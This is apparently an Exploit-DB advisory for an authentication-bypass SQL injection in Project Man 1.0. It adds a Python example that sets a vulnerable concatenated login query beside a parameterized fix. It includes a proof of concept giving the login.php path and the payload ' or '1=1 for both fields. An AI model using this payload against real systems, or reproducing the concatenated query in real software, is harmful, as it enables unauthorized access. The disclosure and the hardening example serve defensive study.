vendor: Project Man
by: cr4wl3r
CVSS: 7,5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Project Man
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:project_man:project_man:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Project Man <= 1.0 (Auth Bypass) SQL Injection Vulnerability

Project Man version 1.0 and below is vulnerable to authentication bypass through SQL injection in the login form. An attacker can exploit this by entering a malicious value in both the username and password fields, for example ' or '1=1, which bypasses the authentication check and grants access to the application.

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in SQL queries.
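
The login query pattern this kind of bypass relies on, next to a parameterized version, as an added example (not Project Man's code, which is PHP and is not shown on this page). Python with sqlite3 stands in for the application; the table layout, accounts and function names are assumptions.

```python
import sqlite3


# Constructed sample data; the table layout is an assumption, not Project Man's schema.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("admin", "correct-horse"), ("o'brien", "battery-staple")],
    )
    return db


def login_concat(db, username, password):
    """Vulnerable pattern: form values are spliced into the SQL text."""
    sql = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return None  # a stray quote in legitimate input breaks the statement
    return row[0] if row else None


def login_param(db, username, password):
    """Hardened pattern: the statement is fixed and values are bound as data."""
    # Production code would fetch a password hash by username and verify it
    # in the application instead of comparing plaintext in SQL.
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "' or '1=1"  # the value quoted in the description above
    print("concat, quoted value:", login_concat(db, payload, payload))
    print("param,  quoted value:", login_param(db, payload, payload))
    print("concat, o'brien:     ", login_concat(db, "o'brien", "battery-staple"))
    print("param,  o'brien:     ", login_param(db, "o'brien", "battery-staple"))
```

The concatenated query also fails for a legitimate user whose name contains a quote, which is why binding parameters is preferable to stripping or rejecting characters.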

Exploit-DB raw data:

##############################################################
##Project Man <= 1.0 (Auth Bypass) SQL Injection Vulnerability
##############################################################
Author: cr4wl3r <cr4wl3r\x40linuxmail\x2Eorg>
Download: http://sourceforge.net/projects/projectman1/files/
##############################################################
PoC:
 [Project Man_path]/login.php

Username: ' or '1=1 
password: ' or '1=1 
##############################################################